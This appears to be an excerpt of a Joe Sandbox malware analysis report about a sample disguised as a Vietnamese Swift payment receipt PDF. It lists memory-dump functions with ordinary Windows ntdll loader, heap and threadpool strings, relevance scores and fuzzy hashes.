Instruction Fuzzy Hash: E1A1D63591022ADFDB24CF58DC84BA9B7B1BF68354F3541E9EA08A7295D7709E80CF90

Function 011E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012410AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01241028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0124106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01240FE5

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 1df73a56bd6cbc9d78b0a34d1da72683e78d0083466bd974cc51099e1400f5ce
Instruction ID: 7372ca419a3b9832c1f9a61e8ffa686e5b297db160e4da4f5ec1c7d22cdac785
Opcode Fuzzy Hash: 1df73a56bd6cbc9d78b0a34d1da72683e78d0083466bd974cc51099e1400f5ce
Instruction Fuzzy Hash: B371D0B1A04715AFCB25DF54C884BAB7FE8AFA4794F400468F9498B146D734D588CFD2

Function 0120245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01202462
minkernel\ntdll\ldrinit.c, xrefs: 0124A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0124A992
LdrpDynamicShimModule, xrefs: 0124A998

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 976406e234a72ffbd3898c0a3c687b156a96e9f1a64c3ffa1b68f1714a23bafc
Instruction ID: fb47fa369fea1784cbfa6b89f0e6e5c0f4f679c8ab99a5350511b67920fe3483
Opcode Fuzzy Hash: 976406e234a72ffbd3898c0a3c687b156a96e9f1a64c3ffa1b68f1714a23bafc
Instruction Fuzzy Hash: CA314F75A61202EBDB39DF5DE84AE6A77B4FB84B04F16001DF902A7285D7B05981C780

Function 011F29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 011F3264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 011F327D
HEAP[%wZ]: , xrefs: 011F3255

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 017ea8ec4bff4f425af6d20948cd5ef523d158c96a76f6939d2a39fe85c26190
Instruction ID: 4c07c4c2038fc2025df891f1ba8baef7db003529a12a5412a2e6fbbf51124792
Opcode Fuzzy Hash: 017ea8ec4bff4f425af6d20948cd5ef523d158c96a76f6939d2a39fe85c26190
Instruction Fuzzy Hash: D692CD70A142499FDB29CF68C444BAEBBF1FF49310F18805DEA5AAB392D734A945CF50

Function 011F0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 012450BD
(UCRBlock->Size >= *Size), xrefs: 012450CA
HEAP[%wZ]: , xrefs: 012450AE

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: ec8b82db5a0fc51c6ae68b6b49e74ef55a56f79c2b9e1704cdb537a0b5fb02a2
Instruction ID: 7555ee3f4cd5d727c50150bbc4a4a8c3d13fc992526b7d63991daeb881e8fd3a
Opcode Fuzzy Hash: ec8b82db5a0fc51c6ae68b6b49e74ef55a56f79c2b9e1704cdb537a0b5fb02a2
Instruction Fuzzy Hash: 0DF1BF70A10606DFEB2DCF68C894B6AB7B6FF48304F14416DE65A9B342D730E981CB91

Function 01206962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 0124CA51
@, xrefs: 01206C24

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: 9ff3b14ddaf0f65bdf4ff1867dbe66e656d5c929453712954518e4fbdd3bbdec
Instruction ID: da31a0b7ed7f8df7f40a310907515f9455f07fc15056c1b6fa30922ea98d7a60
Opcode Fuzzy Hash: 9ff3b14ddaf0f65bdf4ff1867dbe66e656d5c929453712954518e4fbdd3bbdec
Instruction Fuzzy Hash: C9C296716293429FD726CF28C441B6BBBE5BF88714F048A1DFAC987282D774E805CB52

Function 011DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 011DA1C1
\??\, xrefs: 0123C1E4
FilterFullPath, xrefs: 0123C2E6

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 09b75b6e1f335e989eb635bf30c58af401d362c394981a5e23baccc1b4b03eef
Instruction ID: cd2e29c0cf6bcb52347d0824c3e486a8051d4ca9baea49e3e2bc02d44b581d69
Opcode Fuzzy Hash: 09b75b6e1f335e989eb635bf30c58af401d362c394981a5e23baccc1b4b03eef
Instruction Fuzzy Hash: C1A1607192162A9BDB31DF68DC88BE9B7B8FF44710F1001EAEA09A7250D7359E84CF50

Function 01200BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 0124A117
Failed to allocated memory for shimmed module list, xrefs: 0124A10F
minkernel\ntdll\ldrinit.c, xrefs: 0124A121

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 5f99fcd9cae10e4232d8bd34318c6d5185432df88df107e2b4207b841bf2ebfb
Instruction ID: a5382a8b999eba52605a28a27c71a06c70574dc520b7aaddb1166f925ccfa075
Opcode Fuzzy Hash: 5f99fcd9cae10e4232d8bd34318c6d5185432df88df107e2b4207b841bf2ebfb
Instruction Fuzzy Hash: E1710070E202069FEB2ADF68D985BBEB7F4FB44204F04412DE506E7292E774A981CB54

Function 011F0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01245342
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0124534D
HEAP[%wZ]: , xrefs: 01245335

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 4eca2511a71f1552cdbe4db0eaf14382b006789e9df9cea5ae75df11050e7034
Instruction ID: 76c2db6cc6757dd2706e313753cc26cbc593d56eee4b85a1d03f0bb9eef39754
Opcode Fuzzy Hash: 4eca2511a71f1552cdbe4db0eaf14382b006789e9df9cea5ae75df11050e7034
Instruction Fuzzy Hash: 2061CF74610306DFDB2DCF28C480B6ABBE2FF49704F14855DE99A8B296D770E881CB91

Function 0121C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 012582DE
minkernel\ntdll\ldrinit.c, xrefs: 012582E8
Failed to reallocate the system dirs string !, xrefs: 012582D7

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 9c5ffa52b2f91a739305a6f644b9c0c202ba8de7a7db70fd9e825f84096ff94b
Instruction ID: 118755526d1af5b619c275ab2005ed5125c0717a4133be506b2f70ceea68a7cb
Opcode Fuzzy Hash: 9c5ffa52b2f91a739305a6f644b9c0c202ba8de7a7db70fd9e825f84096ff94b
Instruction Fuzzy Hash: A1415575961302ABD729EB68E888B6B7BECEF54750F00452EFA44C3294E7B4D800CB91

Function 0129C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0129C1C5
PreferredUILanguages, xrefs: 0129C212
@, xrefs: 0129C1F1

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 8a31fa53d49676ad918ac6c4986deea5e2aaf6e9a736fdab4f611cb81c676cae
Instruction ID: 897280a3b713e4df9959d53e8115775e8f2317116ca895f7e728b3f6da519f46
Opcode Fuzzy Hash: 8a31fa53d49676ad918ac6c4986deea5e2aaf6e9a736fdab4f611cb81c676cae
Instruction Fuzzy Hash: 59418371E2021AEBDF15DBDCC891FEEBBB8AB14704F1040AAE605B7280D7749A44CB90

Function 01274144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 01274172
@, xrefs: 01274225
LdrpResValidateFilePath Enter, xrefs: 01274160

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 32def03cbffa1f83c45344a8a58677a00e45c473f3e2f0e5b8d76921d8c02226
Instruction ID: c67a46d0e3d66de2eaacd54a3ba53bc401e69c11128682553abd783e0a1fa82a
Opcode Fuzzy Hash: 32def03cbffa1f83c45344a8a58677a00e45c473f3e2f0e5b8d76921d8c02226
Instruction Fuzzy Hash: 15412671A2068A8FEB25EBD9D840BAEBBB8FF55344F14045ADA11EB791D7748901CB10

Function 01264755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01264888
LdrpCheckRedirection, xrefs: 0126488F
minkernel\ntdll\ldrredirect.c, xrefs: 01264899

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 30b2679674ec0f703067624c9fbef821d071a0ef707f19a6535ec8f759c9da53
Instruction ID: 07ef43eae5988febb1f36c728fc9945c77f19761f954ec9d8b341b2c39cd2896
Opcode Fuzzy Hash: 30b2679674ec0f703067624c9fbef821d071a0ef707f19a6535ec8f759c9da53
Instruction Fuzzy Hash: E841E432A252D28FDB26EE6CD940A267BECEF89650B06015DEEC4D73D1D330D880CB81

Function 011F0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0124543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01245449
HEAP[%wZ]: , xrefs: 01245431

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 221515c834b313d93a14af42ddb08995dc3c60678041ad1a33c17a23a056325d
Instruction ID: 83f535809d8dc1257f310efd8f73f38db76dadcdf9fd4232fb1937deace515a4
Opcode Fuzzy Hash: 221515c834b313d93a14af42ddb08995dc3c60678041ad1a33c17a23a056325d
Instruction Fuzzy Hash: DF110F3032A1469FDB2DCF18C491B7AB3A6EF41A1AF19805DF546CF252DB30D841C755

Function 012620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 012620FA
minkernel\ntdll\ldrinit.c, xrefs: 01262104
Process initialization failed with status 0x%08lx, xrefs: 012620F3

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 168e8c995fb318da250f75b36d50ad73e9924ddc5610f86b6194daa48f45ffe3
Instruction ID: 12c15f4f51f709e13c3e66b985f8d74bf071e8e699c4fbfc66960a29683e5acf
Opcode Fuzzy Hash: 168e8c995fb318da250f75b36d50ad73e9924ddc5610f86b6194daa48f45ffe3
Instruction Fuzzy Hash: 79F0AF75A51259FBE728E64CDC4AFAA37ACEB50B54F510069FB0077286E2F0A940CA91

Function 011F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01244D8A

Strings

#%u, xrefs: 01244D82

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: c7037c0a375a38dd40194f982f7111b7df5ebea3b4972681cf2b3bc00af1b5c8
Instruction ID: c5da81e048b86f67c74f40ca25ef8f6518835fbb5651200a936d74facd4b4577
Opcode Fuzzy Hash: c7037c0a375a38dd40194f982f7111b7df5ebea3b4972681cf2b3bc00af1b5c8
Instruction Fuzzy Hash: 3B715C71A1014A9FDB09DFA8C990FAEB7F8BF08304F154069EA01E7291EB34ED41CB64

Function 011EA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 011EAA25
LdrResSearchResource Enter, xrefs: 011EAA13

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 1047135352db18e1b2d483dbadba9f8ae2eb62ec9937dd1934f1f3706cf1b2b3
Instruction ID: 746ee8556833acaeab779f975335d7563cb5f3a27a701f08ba10e741d67a9a08
Opcode Fuzzy Hash: 1047135352db18e1b2d483dbadba9f8ae2eb62ec9937dd1934f1f3706cf1b2b3
Instruction Fuzzy Hash: DCE1AF71A10619EBEF2ECED9E988BAEBBF9BF54310F114426FA01E7241D7749940CB50

Function 012AA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 012AA44B
`, xrefs: 012AA551

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 24aa55d2486130865a3a68a58dfd35c7a81d11e0a711796c68441ad79c87838a
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: D3C1CF312243429FEB25CF28C841B6BBBE5EFC4718F484A2DF6968B290D7B4D509CB41

Function 0125E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0125E751
Legacy, xrefs: 0125E75A

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 84835791ae00c467d363870dd7f8c615a1efc0d537c5fd87c6294cf02afe6033
Instruction ID: cd5a18bd68672719533e450472f8c6392d5b0db40eebbb6949de02367bcb016a
Opcode Fuzzy Hash: 84835791ae00c467d363870dd7f8c615a1efc0d537c5fd87c6294cf02afe6033
Instruction Fuzzy Hash: E1618E72E202199FDB58DFA8C984BADFBB5FF54700F15406DEA09EB251D731AA00CB50

Function 012843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 01284437
MUI, xrefs: 01284525

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 92ffa636e9fb212c3bc6668f34f64580275d8da9b4baf8d924810a00a55613d3
Instruction ID: 3570b4ae54599248ae421e511f1fdb45a93b23a7c901684319326b8d910684be
Opcode Fuzzy Hash: 92ffa636e9fb212c3bc6668f34f64580275d8da9b4baf8d924810a00a55613d3
Instruction Fuzzy Hash: 8F514871D1125EAFDF11EFA9CC80BEEBBB8EB14754F100129E610B7290D7349905CB60

Function 011E04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 011E0540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 011E063D

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: fd2ce9eca7ca303a42aacbdb8f919c6c4344d6ee3af1282720a552aa9168e28d
Instruction ID: e212525f276e73c630a0ec777a79680f44ccaf0acfbedbf624855c86a443573a
Opcode Fuzzy Hash: fd2ce9eca7ca303a42aacbdb8f919c6c4344d6ee3af1282720a552aa9168e28d
Instruction Fuzzy Hash: 2B51AE71604B429BD728DFA8C4487A7BBE4AF8C304F14483EE6EA87241E7B4D545CF92

Function 011EA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 011EA309
RtlpResUltimateFallbackInfo Enter, xrefs: 011EA2FB

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 5b034182f08070d1ce91f7dcd5ca35f272c04673da296af1b55947bc763896a5
Instruction ID: 6d75fe8bd7daf7e402c2a2a324c60265fa2bd1741bef9c68a726047a73e6e856
Opcode Fuzzy Hash: 5b034182f08070d1ce91f7dcd5ca35f272c04673da296af1b55947bc763896a5
Instruction Fuzzy Hash: 7C41D130A18A46CBDB1DCF99E844B6DBBF4FF84704F2540A9EA14DB291E3B5D940CB51

Function 0121A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 0121A5E4
Threadpool!, xrefs: 0121A5E9

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 37a5d0a7abb329c99cecf9e4b0aadc48e3cc4a0123ad68e91f0535ba2adbd95e
Instruction ID: 17958711976c9076a26bb058607ad7247a08071a7f0da5edba923efe8fb54422
Opcode Fuzzy Hash: 37a5d0a7abb329c99cecf9e4b0aadc48e3cc4a0123ad68e91f0535ba2adbd95e
Instruction Fuzzy Hash: 310144B2265780EFD311CF14CD49F2677E8E7A4725F008839E208C7188E334E800CB86

Function 011EC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 011EC8C3, 011ECA40

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 1715ec7ac1b6ad54b32c571081b1367eecfbcd162afe322793cbb88f4d7b3848
Instruction ID: afdae4546ccebb93587afd29d7b158ba5b644f6166b71e67ad3b5196d1d16899
Opcode Fuzzy Hash: 1715ec7ac1b6ad54b32c571081b1367eecfbcd162afe322793cbb88f4d7b3848
Instruction Fuzzy Hash: A9826D75E00A198FEF28CFE9D988BEDBBF1BF44350F148169D919AB250D7309981CB91

Function 01266420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 012665C1

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 608c49749671b1ccbb1c5f4c2b69141e181f69693c55636f42380434824ce463
Instruction ID: 135999d5eb1f2c29f384438d2a92662ff6085096dbc1d5f4518d5e7fa7e1ccd8
Opcode Fuzzy Hash: 608c49749671b1ccbb1c5f4c2b69141e181f69693c55636f42380434824ce463
Instruction Fuzzy Hash: C9916D71A5021AAFEB25DB95DC85FAEBBB8EF08B50F100125F600AB1D1D775AD40CBA0

Function 0128E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 0128E1FA

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: aeb417126d3e1fac72c57c30ce66e0dd05ea6ff39c9beb7439ad715f3e73b893
Instruction ID: 90e36e2a6bce234041759682024ef670060ced087b529ad63d83ea87ba419670
Opcode Fuzzy Hash: aeb417126d3e1fac72c57c30ce66e0dd05ea6ff39c9beb7439ad715f3e73b893
Instruction Fuzzy Hash: A091D03192260ABEDB26AFA4DC44FBFBBB9EF55740F020029F610A7291D7749D01CB50

Function 0121A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 012567C9

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: a34f814d8655fdd3219edfd785045acc5acc150bdfd1fdc31da06655cb46b29b
Instruction ID: 452fa2fde14aac68cef1570d321d6d00516e0c0f19b5366680af41a307571aac
Opcode Fuzzy Hash: a34f814d8655fdd3219edfd785045acc5acc150bdfd1fdc31da06655cb46b29b
Instruction Fuzzy Hash: AB719EB5E2020ADFDF68CF9CD5906ADBBB1FF58710F54812EEA05A7241E7708845CB60

Function 01284978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01284A7F

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: a009d88da286e5e5af58e5475dee33505e559336ff25a0036ace6995c8de11dd
Instruction ID: 82c07fcd3a5141e45b2e9b74d3551f26dc1f291f47a327ad485c4cd321c804a4
Opcode Fuzzy Hash: a009d88da286e5e5af58e5475dee33505e559336ff25a0036ace6995c8de11dd
Instruction Fuzzy Hash: A251A572D2126BDBDF14FF99D840BAEFBB4AF14A14F054129EA11BB280D3749C01CBA4

Function 011FE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 011FE6A4

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 8e868b000e253141968b63db2456dbaa2307b4ce408548ef30cd15dfd1b887b0
Instruction ID: fd6d78da8ffde7f749942adcd6336139b4ad2e4dbfc64ffd9ce4af217780922e
Opcode Fuzzy Hash: 8e868b000e253141968b63db2456dbaa2307b4ce408548ef30cd15dfd1b887b0
Instruction Fuzzy Hash: 8B41C27250A712ABD718DA75C880B6FBBD8AF88718F060A2DF784D7190E774D904C793

